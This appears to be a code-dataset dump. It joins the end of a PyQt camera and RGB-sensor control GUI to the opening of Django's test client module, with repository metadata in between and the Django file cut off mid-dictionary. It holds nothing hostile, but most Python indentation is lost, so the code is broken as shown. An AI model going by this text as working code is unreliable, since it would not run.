hbox2.addWidget(self.prevTimeEntry)
hbox2.addWidget(resLbl)
hbox2.addWidget(self.resEntry)
hbox2.addWidget(zoomLbl)
hbox2.addWidget(self.zoomEntry)
layout = QVBoxLayout()
layout.addLayout(hbox1)
layout.addLayout(hbox2)
layout.addStretch(1)
self.topGroupBox.setLayout(layout)
def createMidTopGroupBox(self):
self.midTopGroupBox = QGroupBox('Auto White Balance Modes')
self.autoAwb = QRadioButton()
self.autoAwb.setText('auto')
self.autoAwb.toggled.connect(lambda: self.abtnstate(self.autoAwb))
self.fluorAwb = QRadioButton()
self.fluorAwb.setText('fluorescent')
self.fluorAwb.toggled.connect(lambda: self.abtnstate(self.fluorAwb))
self.incanAwb = QRadioButton()
self.incanAwb.setText('incandescent')
self.incanAwb.toggled.connect(lambda: self.abtnstate(self.incanAwb))
self.offAwb = QRadioButton()
self.offAwb.setText('off')
self.offAwb.toggled.connect(lambda: self.abtnstate(self.offAwb))
self.defaultAwb = QRadioButton()
self.defaultAwb.setText('default')
self.defaultAwb.toggled.connect(lambda: self.abtnstate(self.defaultAwb))
self.sunAwb = QRadioButton()
self.sunAwb.setText('sun')
self.sunAwb.toggled.connect(lambda: self.abtnstate(self.sunAwb))
self.cloudAwb = QRadioButton()
self.cloudAwb.setText('cloud')
self.cloudAwb.toggled.connect(lambda: self.abtnstate(self.cloudAwb))
self.shadeAwb = QRadioButton()
self.shadeAwb.setText('shade')
self.shadeAwb.toggled.connect(lambda: self.abtnstate(self.shadeAwb))
self.tungsAwb = QRadioButton()
self.tungsAwb.setText('tungsten')
self.tungsAwb.toggled.connect(lambda: self.abtnstate(self.tungsAwb))
self.flashAwb = QRadioButton()
self.flashAwb.setText('flash')
self.flashAwb.toggled.connect(lambda: self.abtnstate(self.flashAwb))
self.horizonAwb = QRadioButton()
self.horizonAwb.setText('horizon')
self.horizonAwb.toggled.connect(lambda: self.abtnstate(self.horizonAwb))
self.defaultAwb.setChecked(True)
hbox1 = QHBoxLayout()
hbox1.addWidget(self.autoAwb)
hbox1.addWidget(self.fluorAwb)
hbox1.addWidget(self.incanAwb)
hbox1.addWidget(self.offAwb)
hbox1.addWidget(self.defaultAwb)
hbox2 = QHBoxLayout()
hbox2.addWidget(self.sunAwb)
hbox2.addWidget(self.cloudAwb)
hbox2.addWidget(self.shadeAwb)
hbox2.addWidget(self.tungsAwb)
hbox2.addWidget(self.flashAwb)
hbox2.addWidget(self.horizonAwb)
layout = QVBoxLayout()
layout.addLayout(hbox1)
layout.addLayout(hbox2)
layout.addStretch(1)
self.midTopGroupBox.setLayout(layout)
def createMidBottomGroupBox(self):
self.midBottomGroupBox = QGroupBox('Exposure Modes')
self.autoExp = QRadioButton()
self.autoExp.setText('auto')
self.autoExp.toggled.connect(lambda: self.btnstate(self.autoExp))
self.nightExp = QRadioButton()
self.nightExp.setText('night')
self.nightExp.toggled.connect(lambda: self.btnstate(self.nightExp))
self.offExp = QRadioButton()
self.offExp.setText('off')
self.offExp.toggled.connect(lambda: self.btnstate(self.offExp))
self.defaultExp = QRadioButton()
self.defaultExp.setText('default')
self.defaultExp.toggled.connect(lambda: self.btnstate(self.defaultExp))
self.sportsExp = QRadioButton()
self.sportsExp.setText('sports')
self.sportsExp.toggled.connect(lambda: self.btnstate(self.sportsExp))
self.longExp = QRadioButton()
self.longExp.setText('verylong')
self.longExp.toggled.connect(lambda: self.btnstate(self.longExp))
self.spotExp = QRadioButton()
self.spotExp.setText('spotlight')
self.spotExp.toggled.connect(lambda: self.btnstate(self.spotExp))
self.backExp = QRadioButton()
self.backExp.setText('backlight')
self.backExp.toggled.connect(lambda: self.btnstate(self.backExp))
self.fireExp = QRadioButton()
self.fireExp.setText('fireworks')
self.fireExp.toggled.connect(lambda: self.btnstate(self.fireExp))
self.antiExp = QRadioButton()
self.antiExp.setText('antishake')
self.antiExp.toggled.connect(lambda: self.btnstate(self.antiExp))
self.fixedExp = QRadioButton()
self.fixedExp.setText('fixedfps')
self.fixedExp.toggled.connect(lambda: self.btnstate(self.fixedExp))
self.beachExp = QRadioButton()
self.beachExp.setText('beach')
self.beachExp.toggled.connect(lambda: self.btnstate(self.beachExp))
self.snowExp = QRadioButton()
self.snowExp.setText('snow')
self.snowExp.toggled.connect(lambda: self.btnstate(self.snowExp))
self.nightpExp = QRadioButton()
self.nightpExp.setText('nightpreview')
self.nightpExp.toggled.connect(lambda: self.btnstate(self.nightpExp))
self.defaultExp.setChecked(True)
hbox1 = QHBoxLayout()
hbox1.addWidget(self.autoExp)
hbox1.addWidget(self.longExp)
hbox1.addWidget(self.nightExp)
hbox1.addWidget(self.defaultExp)
hbox1.addWidget(self.spotExp)
hbox1.addWidget(self.sportsExp)
hbox1.addWidget(self.offExp)
hbox2 = QHBoxLayout()
hbox2.addWidget(self.backExp)
hbox2.addWidget(self.fireExp)
hbox2.addWidget(self.antiExp)
hbox2.addWidget(self.fixedExp)
hbox2.addWidget(self.beachExp)
hbox2.addWidget(self.snowExp)
hbox2.addWidget(self.nightpExp)
layout = QVBoxLayout()
layout.addLayout(hbox1)
layout.addLayout(hbox2)
layout.addStretch(1)
self.midBottomGroupBox.setLayout(layout)
def abtnstate(self, state):
if state.text() == 'auto':
if state.isChecked():
self.awbvar = 'auto'
elif state.text() == 'fluorescent':
if state.isChecked():
self.awbvar = 'fluorescent'
elif state.text() == 'incandescent':
if state.isChecked():
self.awbvar = 'incandescent'
elif state.text() == 'off':
if state.isChecked():
self.awbvar = 'off'
elif state.text() == 'default':
if state.isChecked():
self.awbvar = ''
elif state.text() == 'sun':
if state.isChecked():
self.awbvar = 'sun'
elif state.text() == 'cloud':
if state.isChecked():
self.awbvar = 'cloud'
elif state.text() == 'shade':
if state.isChecked():
self.awbvar = 'shade'
elif state.text() == 'tungsten':
if state.isChecked():
self.awbvar = 'tungsten'
elif state.text() == 'flash':
if state.isChecked():
self.awbvar = 'flash'
elif state.text() == 'horizon':
if state.isChecked():
self.awbvar = 'horizon'
def btnstate(self, state):
if state.text() == 'auto':
if state.isChecked():
self.expvar = 'auto'
elif state.text() == 'night':
if state.isChecked():
self.expvar = 'night'
elif state.text() == 'verylong':
if state.isChecked():
self.expvar = 'verylong'
elif state.text() == 'off':
if state.isChecked():
self.expvar = 'off'
elif state.text() == 'default':
if state.isChecked():
self.expvar = ''
elif state.text() == 'sports':
if state.isChecked():
self.expvar = 'sports'
elif state.text() == 'spotlight':
if state.isChecked():
self.expvar = 'spotlight'
elif state.text() == 'backlight':
if state.isChecked():
self.expvar = 'backlight'
elif state.text() == 'fireworks':
if state.isChecked():
self.expvar = 'fireworks'
elif state.text() == 'antishake':
if state.isChecked():
self.expvar = 'antishake'
        elif state.text() == 'fixedfps':
            if state.isChecked():
                self.expvar = 'fixedfps'
        elif state.text() == 'beach':
if state.isChecked():
self.expvar = 'beach'
elif state.text() == 'snow':
if state.isChecked():
self.expvar = 'snow'
elif state.text() == 'nightpreview':
if state.isChecked():
self.expvar = 'nightpreview'
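    # Editorial note: the two dispatcher methods above are behavior-equivalent
    # to a table-free sketch, since each button's text matches its stored
    # value except 'default' (which maps to the empty string):
    #
    #   def btnstate(self, state):
    #       if state.isChecked():
    #           text = state.text()
    #           self.expvar = '' if text == 'default' else text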
def createBottomLeftGroupBox(self):
self.bottomLeftGroupBox = QGroupBox('Camera Options')
captureBtn = QPushButton('Take Picture')
captureBtn.clicked.connect(self.takePictureThread)
setNormOptionsBtn = QPushButton('Set Normal Options')
setNormOptionsBtn.clicked.connect(self.normalSettings)
setDarkOptionsBtn = QPushButton('Set Low Light Options')
setDarkOptionsBtn.clicked.connect(self.darkSettings)
previewBtn = QPushButton('Camera Preview')
previewBtn.clicked.connect(self.cameraPreviewThread)
showPlotsBtn = QPushButton('Show Plots')
showPlotsBtn.clicked.connect(self.showPlots)
showImageBtn = QPushButton('Show Image')
showImageBtn.clicked.connect(lambda: self.showImage(showImageBtn.text()))
importImageBtn = QPushButton('Import Image')
importImageBtn.clicked.connect(self.importImageThread)
saveImageBtn = QPushButton('Save Image')
saveImageBtn.clicked.connect(self.saveImage)
showRedImageBtn = QPushButton('Show Red')
showRedImageBtn.clicked.connect(lambda: self.showImage(showRedImageBtn.text()))
showBlueImageBtn = QPushButton('Show Blue')
showBlueImageBtn.clicked.connect(lambda: self.showImage(showBlueImageBtn.text()))
showGreenImageBtn = QPushButton('Show Green')
showGreenImageBtn.clicked.connect(lambda: self.showImage(showGreenImageBtn.text()))
saveAllBtn = QPushButton('Save All')
saveAllBtn.clicked.connect(self.saveAllThread)
vbox1 = QVBoxLayout()
vbox1.addWidget(captureBtn)
vbox1.addWidget(setNormOptionsBtn)
vbox1.addWidget(setDarkOptionsBtn)
vbox1.addWidget(previewBtn)
vbox2 = QVBoxLayout()
vbox2.addWidget(showImageBtn)
vbox2.addWidget(showPlotsBtn)
vbox2.addWidget(importImageBtn)
vbox2.addWidget(saveImageBtn)
vbox3 = QVBoxLayout()
vbox3.addWidget(showRedImageBtn)
vbox3.addWidget(showGreenImageBtn)
vbox3.addWidget(showBlueImageBtn)
vbox3.addWidget(saveAllBtn)
layout = QHBoxLayout()
layout.addLayout(vbox1)
layout.addLayout(vbox2)
layout.addLayout(vbox3)
layout.addStretch(1)
self.bottomLeftGroupBox.setLayout(layout)
def takePictureThread(self):
self.statusbar = 'Taking Picture...'
captureThread = threading.Thread(target=self.takePicture)
captureThread.start()
def importImageThread(self):
self.statusbar = 'Importing Image...'
self.image = QFileDialog.getOpenFileName(self, 'Choose Image', os.sep.join((os.path.expanduser('~'), 'Desktop')),
'Image Files (*.png *.jpg *.jpeg)')
importThread = threading.Thread(target=self.importImage)
importThread.start()
def cameraPreviewThread(self):
self.statusbar = 'Loading Preview...'
previewThread = threading.Thread(target=self.cameraPreview)
previewThread.start()
def saveAllThread(self):
self.statusbar = 'Saving Files..'
self.directory = QFileDialog.getExistingDirectory(self, 'Choose Directory', os.path.expanduser('~'))
saveThread = threading.Thread(target=self.saveAll)
saveThread.start()
def takePicture(self):
iso = int(float(self.isoEntry.text()))
resolution_string = self.resEntry.text().split('x')
resolution = (int(float(resolution_string[0])), int(float(resolution_string[1])))
delay = int(float(self.delayEntry.text()))
brightness = int(float(self.brightEntry.text()))
contrast = int(float(self.contrastEntry.text()))
shutterspeed = int(float(self.shutterEntry.text()))
zoom = tuple(map(float, self.zoomEntry.text().split(',')))
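        # e.g. an entry of '0.0, 0.0, 1.0, 1.0' parses to (0.0, 0.0, 1.0, 1.0),
        # presumably a normalized (x, y, w, h) region of interest for RPiCamera.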
exposuremode = self.expvar
awbmode = self.awbvar
self.rgb_array = RPiCamera.takePicture(iso=iso, timeout=delay, resolution=resolution, exposure=exposuremode,
brightness=brightness, contrast=contrast, shutterspeed=shutterspeed,
zoom=zoom, awb_mode=awbmode)
red_intensity, green_intensity, blue_intensity, intensity = RPiCamera.returnIntensity(self.rgb_array)
intensity_array = '\n'.join(['R:' + '{:.3f}'.format(red_intensity),
'G:' + '{:.3f}'.format(green_intensity),
'B:' + '{:.3f}'.format(blue_intensity),
'I:' + '{:.3f}'.format(intensity)])
self.intensityLbl.setText(intensity_array)
self.intensityLbl.adjustSize()
self.statusbar = 'Ready'
def normalSettings(self):
self.delayEntry.setText('5')
self.prevTimeEntry.setText('10')
self.shutterEntry.setText('0')
def darkSettings(self):
self.delayEntry.setText('50')
self.prevTimeEntry.setText('50')
self.shutterEntry.setText('6000000')
def cameraPreview(self):
iso = int(float(self.isoEntry.text()))
resolution_string = self.resEntry.text().split('x')
resolution = (int(float(resolution_string[0])), int(float(resolution_string[1])))
delay = int(float(self.prevTimeEntry.text()))
brightness = int(float(self.brightEntry.text()))
contrast = int(float(self.contrastEntry.text()))
shutterspeed = int(float(self.shutterEntry.text()))
zoom = tuple(map(float, self.zoomEntry.text().split(',')))
exposuremode = self.expvar
awbmode = self.awbvar
RPiCamera.startPreview(iso=iso, timeout=delay, resolution=resolution, exposure=exposuremode,
brightness=brightness, contrast=contrast, shutterspeed=shutterspeed,
zoom=zoom, awb_mode=awbmode)
self.statusbar = 'Ready'
def showPlots(self):
try:
RPiCamera.showPlot(self.rgb_array)
self.statusbar = 'Ready'
except ValueError:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('Array not loaded, make sure you take picture or import an image first.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
def showImage(self, text):
try:
if text == 'Show Red':
RPiCamera.showImage(self.rgb_array, 'r')
elif text == 'Show Green':
RPiCamera.showImage(self.rgb_array, 'g')
elif text == 'Show Blue':
RPiCamera.showImage(self.rgb_array, 'b')
else:
RPiCamera.showImage(self.rgb_array)
except ValueError:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('Array not loaded, make sure you take picture or import an image first.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
def saveImage(self):
filename = QFileDialog.getSaveFileName(self, 'Save Image As', os.sep.join((os.path.expanduser('~'), 'Desktop')), 'Image Files (*.png *.jpg *.jpeg)')
RPiCamera.saveImage(self.rgb_array, filename[0])
def saveAll(self):
foldername = 'ISO={}-Delay={}-Resolution={}-Brightness={}-Contrast={}-ShutterSpeed={}' \
'-Exposure={}-AutoWhiteBalance={}-' \
'Zoom={}'.format(self.isoEntry.text(), self.delayEntry.text(), self.resEntry.text(),
self.brightEntry.text(), self.contrastEntry.text(),
self.shutterEntry.text(), self.expvar, self.awbvar, self.zoomEntry.text())
RPiCamera.saveAllImages(self.rgb_array, self.directory, foldername)
self.statusbar = 'Ready'
def importImage(self):
self.rgb_array = RPiCamera.importImage(self.image[0])
red_intensity, green_intensity, blue_intensity, intensity = RPiCamera.returnIntensity(self.rgb_array)
intensity_array = '\n'.join(['R:' + '{:.3f}'.format(red_intensity),
'G:' + '{:.3f}'.format(green_intensity),
'B:' + '{:.3f}'.format(blue_intensity),
'I:' + '{:.3f}'.format(intensity)])
self.intensityLbl.setText(intensity_array)
self.intensityLbl.adjustSize()
self.statusbar = 'Ready'
def createBottomRightGroupBox(self):
self.bottomRightGroupBox = QGroupBox('Image Intensity Data')
self.intensityLbl = QLabel('Not Taken')
layout = QHBoxLayout()
layout.addWidget(self.intensityLbl)
layout.addStretch(1)
self.bottomRightGroupBox.setLayout(layout)
class CameraMainWindow(QMainWindow):
def __init__(self):
super(CameraMainWindow, self).__init__()
self.initUI()
def initUI(self):
# QToolTip.setFont(QFont('SansSerif', 9))
self.cwidget = CameraCenterWidget()
self.setCentralWidget(self.cwidget)
# self.setToolTip('This is a <b>QWidget</b> widget')
self.center()
self.setWindowTitle('Camera Control GUI')
self.statusBarTimer = QTimer(self)
self.statusBarTimer.timeout.connect(self.statusUpdate)
self.statusBarTimer.start(100)
# self.p = QPalette(self.palette())
# self.p.setColor(QPalette.Window, QColor(53, 53, 53))
# self.p.setColor(QPalette.WindowText, Qt.white)
# self.p.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
# self.p.setColor(QPalette.ToolTipBase, Qt.white)
# self.p.setColor(QPalette.ToolTipText, Qt.white)
# self.p.setColor(QPalette.Button, QColor(53, 53, 53))
# self.p.setColor(QPalette.ButtonText, Qt.white)
# self.p.setColor(QPalette.BrightText, Qt.red)
# self.p.setColor(QPalette.Highlight, QColor(142, 45, 197).lighter())
# self.p.setColor(QPalette.HighlightedText, Qt.black)
# self.setPalette(self.p)
self.show()
def statusUpdate(self):
self.statusBar().showMessage(self.cwidget.statusbar)
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message', 'Are you sure you want to quit?',
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
# def quitApp(self):
# QCoreApplication.instance().quit()
class RGBCenterWidget(QWidget):
def __init__(self):
super(RGBCenterWidget, self).__init__()
self.initUI()
# self.start_time = time.time()
def initUI(self):
self.tf = 'PlotTextFile.txt'
self.statusbar = 'Ready'
self.createTopGroupBox()
self.createMidGroupBox()
self.createBottomLeftGroupBox()
self.createBottomRightGroupBox()
topLayout = QVBoxLayout()
topLayout.addWidget(self.topGroupBox)
topLayout.addWidget(self.midGroupBox)
bottomLayout = QHBoxLayout()
bottomLayout.addWidget(self.bottomLeftGroupBox)
bottomLayout.addWidget(self.bottomRightGroupBox)
mainLayout = QVBoxLayout()
mainLayout.addLayout(topLayout)
mainLayout.addLayout(bottomLayout)
mainLayout.addStretch(1)
self.setLayout(mainLayout)
self.show()
def createTopGroupBox(self):
self.topGroupBox = QGroupBox('Integration Time')
self.it2_4ms = QRadioButton()
self.it2_4ms.setText('2.4ms')
self.it2_4ms.toggled.connect(lambda: self.itstate(self.it2_4ms))
self.it24ms = QRadioButton()
self.it24ms.setText('24ms')
self.it24ms.toggled.connect(lambda: self.itstate(self.it24ms))
self.it50ms = QRadioButton()
self.it50ms.setText('50ms')
self.it50ms.toggled.connect(lambda: self.itstate(self.it50ms))
self.it101ms = QRadioButton()
self.it101ms.setText('101ms')
self.it101ms.toggled.connect(lambda: self.itstate(self.it101ms))
self.it154ms = QRadioButton()
self.it154ms.setText('154ms')
self.it154ms.toggled.connect(lambda: self.itstate(self.it154ms))
self.it700ms = QRadioButton()
self.it700ms.setText('700ms')
self.it700ms.toggled.connect(lambda: self.itstate(self.it700ms))
self.it2_4ms.setChecked(True)
layout = QHBoxLayout()
layout.addWidget(self.it2_4ms)
layout.addWidget(self.it24ms)
layout.addWidget(self.it50ms)
layout.addWidget(self.it101ms)
layout.addWidget(self.it154ms)
layout.addWidget(self.it700ms)
layout.addStretch(1)
self.topGroupBox.setLayout(layout)
def createMidGroupBox(self):
self.midGroupBox = QGroupBox('Gain')
self.gain1 = QRadioButton()
self.gain1.setText('1X')
self.gain1.toggled.connect(lambda: self.gnstate(self.gain1))
self.gain4 = QRadioButton()
self.gain4.setText('4X')
self.gain4.toggled.connect(lambda: self.gnstate(self.gain4))
self.gain16 = QRadioButton()
self.gain16.setText('16X')
self.gain16.toggled.connect(lambda: self.gnstate(self.gain16))
self.gain60 = QRadioButton()
self.gain60.setText('60X')
self.gain60.toggled.connect(lambda: self.gnstate(self.gain60))
self.gain1.setChecked(True)
layout = QHBoxLayout()
layout.addWidget(self.gain1)
layout.addWidget(self.gain4)
layout.addWidget(self.gain16)
layout.addWidget(self.gain60)
layout.addStretch(1)
self.midGroupBox.setLayout(layout)
def itstate(self, state):
if state.text() == '2.4ms':
if state.isChecked():
self.itvar = '2.4'
elif state.text() == '24ms':
if state.isChecked():
self.itvar = '24'
elif state.text() == '50ms':
if state.isChecked():
self.itvar = '50'
elif state.text() == '101ms':
if state.isChecked():
self.itvar = '101'
elif state.text() == '154ms':
if state.isChecked():
self.itvar = '154'
elif state.text() == '700ms':
if state.isChecked():
self.itvar = '700'
def gnstate(self, state):
if state.text() == '1X':
if state.isChecked():
self.gainvar = '1'
elif state.text() == '4X':
if state.isChecked():
self.gainvar = '4'
elif state.text() == '16X':
if state.isChecked():
self.gainvar = '16'
elif state.text() == '60X':
if state.isChecked():
self.gainvar = '60'
def createBottomLeftGroupBox(self):
self.bottomLeftGroupBox = QGroupBox('Sensor Options')
captureBtn = QPushButton('Capture Data')
captureBtn.clicked.connect(self.captureDataThread)
setNormOptionsBtn = QPushButton('Set Normal Options')
setNormOptionsBtn.clicked.connect(self.normalSettings)
setDarkOptionsBtn = QPushButton('Set Low Light Options')
setDarkOptionsBtn.clicked.connect(self.darkSettings)
saveBtn = QPushButton('Save Data')
saveBtn.clicked.connect(self.saveData)
layout = QVBoxLayout()
layout.addWidget(captureBtn)
layout.addWidget(setNormOptionsBtn)
layout.addWidget(setDarkOptionsBtn)
layout.addWidget(saveBtn)
layout.addStretch(1)
self.bottomLeftGroupBox.setLayout(layout)
def captureDataThread(self):
self.statusbar = 'Capturing Data...'
captureThread = threading.Thread(target=self.captureData)
captureThread.start()
def captureData(self):
self.red_intensity, self.green_intensity, self.blue_intensity, self.clear_unfiltered, self.lux,\
self.color_temperature = RGBSensor.Capture(integrationtime=float(self.itvar), gain=int(self.gainvar))
intensity_array = '\n'.join(['R:' + '{}'.format(self.red_intensity),
'G:' + '{}'.format(self.green_intensity),
'B:' + '{}'.format(self.blue_intensity),
'Clear:' + '{}'.format(self.clear_unfiltered),
'Luminosity:{} lux'.format(self.lux),
'Color Temperature:{} K'.format(self.color_temperature)])
self.intensityLbl.setText(intensity_array)
self.intensityLbl.adjustSize()
self.statusbar = 'Ready'
def normalSettings(self):
self.gain1.setChecked(True)
self.it2_4ms.setChecked(True)
def darkSettings(self):
self.gain60.setChecked(True)
self.it700ms.setChecked(True)
def saveData(self):
RGBSensor.saveData(self.red_intensity, self.green_intensity, self.blue_intensity, self.clear_unfiltered,
self.lux, self.color_temperature)
self.statusbar = 'Ready'
def createBottomRightGroupBox(self):
self.bottomRightGroupBox = QGroupBox('Sensor Data')
self.intensityLbl = QLabel('Not Taken')
layout = QHBoxLayout()
layout.addWidget(self.intensityLbl)
layout.addStretch(1)
self.bottomRightGroupBox.setLayout(layout)
class RGBMainWindow(QMainWindow):
def __init__(self):
super(RGBMainWindow, self).__init__()
self.initUI()
def initUI(self):
# QToolTip.setFont(QFont('SansSerif', 9))
self.cwidget = RGBCenterWidget()
self.setCentralWidget(self.cwidget)
# self.setToolTip('This is a <b>QWidget</b> widget')
self.center()
self.setWindowTitle('RGB Sensor GUI')
self.statusBarTimer = QTimer(self)
self.statusBarTimer.timeout.connect(self.statusUpdate)
self.statusBarTimer.start(100)
# self.p = QPalette(self.palette())
# self.p.setColor(QPalette.Window, QColor(53, 53, 53))
# self.p.setColor(QPalette.WindowText, Qt.white)
# self.p.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
# self.p.setColor(QPalette.ToolTipBase, Qt.white)
# self.p.setColor(QPalette.ToolTipText, Qt.white)
# self.p.setColor(QPalette.Button, QColor(53, 53, 53))
# self.p.setColor(QPalette.ButtonText, Qt.white)
# self.p.setColor(QPalette.BrightText, Qt.red)
# self.p.setColor(QPalette.Highlight, QColor(142, 45, 197).lighter())
# self.p.setColor(QPalette.HighlightedText, Qt.black)
# self.setPalette(self.p)
self.show()
def statusUpdate(self):
self.statusBar().showMessage(self.cwidget.statusbar)
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message', 'Are you sure you want to quit?',
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
# def quitApp(self):
# QCoreApplication.instance().quit()
def startGUI():
app = QApplication(sys.argv)
mw = GUIMainWindow()
# cw = GUICenterWidget()
rc = app.exec_()
del app
sys.exit(rc)
def startCameraGUI():
app = QApplication(sys.argv)
mw = CameraMainWindow()
# cw = CameraCenterWidget()
rc = app.exec_()
del app
sys.exit(rc)
def startRGBSensorGUI():
app = QApplication(sys.argv)
mw = RGBMainWindow()
# cw = RGBCenterWidget()
rc = app.exec_()
del app
sys.exit(rc)
|
gpl-3.0
| 4,477,484,512,611,405,000
| 34.548441
| 156
| 0.614324
| false
| 3.81519
| false
| false
| false
|
andersonresende/django
|
django/test/client.py
|
2
|
24532
|
from __future__ import unicode_literals
import sys
import os
import re
import mimetypes
from copy import copy
from importlib import import_module
from io import BytesIO
from django.apps import apps
from django.conf import settings
from django.core import urlresolvers
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import WSGIRequest, ISO_8859_1, UTF_8
from django.core.signals import (request_started, request_finished,
got_request_exception)
from django.db import close_old_connections
from django.http import SimpleCookie, HttpRequest, QueryDict
from django.template import TemplateDoesNotExist
from django.test import signals
from django.utils.functional import curry, SimpleLazyObject
from django.utils.encoding import force_bytes, force_str, uri_to_iri
from django.utils.http import urlencode
from django.utils.itercompat import is_iterable
from django.utils import six
from django.utils.six.moves.urllib.parse import urlparse, urlsplit
from django.test.utils import ContextList
__all__ = ('Client', 'RequestFactory', 'encode_file', 'encode_multipart')
BOUNDARY = 'BoUnDaRyStRiNg'
MULTIPART_CONTENT = 'multipart/form-data; boundary=%s' % BOUNDARY
CONTENT_TYPE_RE = re.compile('.*; charset=([\w\d-]+);?')
class FakePayload(object):
"""
A wrapper around BytesIO that restricts what can be read since data from
the network can't be seeked and cannot be read outside of its content
length. This makes sure that views can't do anything under the test client
that wouldn't work in Real Life.
"""
def __init__(self, content=None):
self.__content = BytesIO()
self.__len = 0
self.read_started = False
if content is not None:
self.write(content)
def __len__(self):
return self.__len
def read(self, num_bytes=None):
if not self.read_started:
self.__content.seek(0)
self.read_started = True
if num_bytes is None:
num_bytes = self.__len or 0
assert self.__len >= num_bytes, "Cannot read more than the available bytes from the HTTP incoming data."
content = self.__content.read(num_bytes)
self.__len -= num_bytes
return content
def write(self, content):
if self.read_started:
raise ValueError("Unable to write a payload after he's been read")
content = force_bytes(content)
self.__content.write(content)
self.__len += len(content)
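# Editorial usage sketch (not part of Django): FakePayload mimics a network
# stream, so reads are destructive and bounded by the declared length.
def _fake_payload_example():
    payload = FakePayload(b'hello')
    assert len(payload) == 5
    first = payload.read(2)   # b'he'
    rest = payload.read()     # b'llo' -- read() with no argument drains the rest
    # payload.read(1) would now fail the length assertion, and
    # payload.write(b'x') would raise ValueError once reading has started.
    return first, rest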
def closing_iterator_wrapper(iterable, close):
try:
for item in iterable:
yield item
finally:
request_finished.disconnect(close_old_connections)
close() # will fire request_finished
request_finished.connect(close_old_connections)
class ClientHandler(BaseHandler):
"""
    An HTTP handler that can be used for testing purposes. Uses the WSGI
interface to compose requests, but returns the raw HttpResponse object with
the originating WSGIRequest attached to its ``wsgi_request`` attribute.
"""
def __init__(self, enforce_csrf_checks=True, *args, **kwargs):
self.enforce_csrf_checks = enforce_csrf_checks
super(ClientHandler, self).__init__(*args, **kwargs)
def __call__(self, environ):
# Set up middleware if needed. We couldn't do this earlier, because
# settings weren't available.
if self._request_middleware is None:
self.load_middleware()
request_started.disconnect(close_old_connections)
request_started.send(sender=self.__class__, environ=environ)
request_started.connect(close_old_connections)
request = WSGIRequest(environ)
# sneaky little hack so that we can easily get round
# CsrfViewMiddleware. This makes life easier, and is probably
# required for backwards compatibility with external tests against
# admin views.
request._dont_enforce_csrf_checks = not self.enforce_csrf_checks
# Request goes through middleware.
response = self.get_response(request)
# Attach the originating request to the response so that it could be
# later retrieved.
response.wsgi_request = request
# We're emulating a WSGI server; we must call the close method
# on completion.
if response.streaming:
response.streaming_content = closing_iterator_wrapper(
response.streaming_content, response.close)
else:
request_finished.disconnect(close_old_connections)
response.close() # will fire request_finished
request_finished.connect(close_old_connections)
return response
def store_rendered_templates(store, signal, sender, template, context, **kwargs):
"""
Stores templates and contexts that are rendered.
The context is copied so that it is an accurate representation at the time
of rendering.
"""
store.setdefault('templates', []).append(template)
store.setdefault('context', ContextList()).append(copy(context))
def encode_multipart(boundary, data):
"""
Encodes multipart POST data from a dictionary of form values.
The key will be used as the form data name; the value will be transmitted
as content. If the value is a file, the contents of the file will be sent
as an application/octet-stream; otherwise, str(value) will be sent.
"""
lines = []
to_bytes = lambda s: force_bytes(s, settings.DEFAULT_CHARSET)
# Not by any means perfect, but good enough for our purposes.
is_file = lambda thing: hasattr(thing, "read") and callable(thing.read)
# Each bit of the multipart form data could be either a form value or a
# file, or a *list* of form values and/or files. Remember that HTTP field
# names can be duplicated!
for (key, value) in data.items():
if is_file(value):
lines.extend(encode_file(boundary, key, value))
elif not isinstance(value, six.string_types) and is_iterable(value):
for item in value:
if is_file(item):
lines.extend(encode_file(boundary, key, item))
else:
lines.extend([to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
item
]])
else:
lines.extend([to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
value
]])
lines.extend([
to_bytes('--%s--' % boundary),
b'',
])
return b'\r\n'.join(lines)
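# Editorial usage sketch: encoding a form with a scalar and a repeated field.
def _encode_multipart_example():
    body = encode_multipart(BOUNDARY, {'name': 'value', 'tags': ['a', 'b']})
    # 'tags' is emitted twice (one part per list item), and the payload ends
    # with the closing '--BoUnDaRyStRiNg--' delimiter.
    assert body.endswith(b'--BoUnDaRyStRiNg--\r\n')
    return body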
def encode_file(boundary, key, file):
to_bytes = lambda s: force_bytes(s, settings.DEFAULT_CHARSET)
if hasattr(file, 'content_type'):
content_type = file.content_type
else:
content_type = mimetypes.guess_type(file.name)[0]
if content_type is None:
content_type = 'application/octet-stream'
return [
to_bytes('--%s' % boundary),
to_bytes('Content-Disposition: form-data; name="%s"; filename="%s"'
% (key, os.path.basename(file.name))),
to_bytes('Content-Type: %s' % content_type),
b'',
file.read()
]
class RequestFactory(object):
"""
Class that lets you create mock Request objects for use in testing.
Usage:
rf = RequestFactory()
get_request = rf.get('/hello/')
post_request = rf.post('/submit/', {'foo': 'bar'})
Once you have a request object you can pass it to any view function,
just as if that view had been hooked up using a URLconf.
"""
def __init__(self, **defaults):
self.defaults = defaults
self.cookies = SimpleCookie()
self.errors = BytesIO()
def _base_environ(self, **request):
"""
The base environment for a request.
"""
# This is a minimal valid WSGI environ dictionary, plus:
# - HTTP_COOKIE: for cookie support,
# - REMOTE_ADDR: often useful, see #8551.
# See http://www.python.org/dev/peps/pep-3333/#environ-variables
environ = {
'HTTP_COOKIE': self.cookies.output(header='', sep='; '),
'PATH_INFO': str('/'),
'REMOTE_ADDR': str('127.0.0.1'),
'REQUEST_METHOD': str('GET'),
'SCRIPT_NAME': str(''),
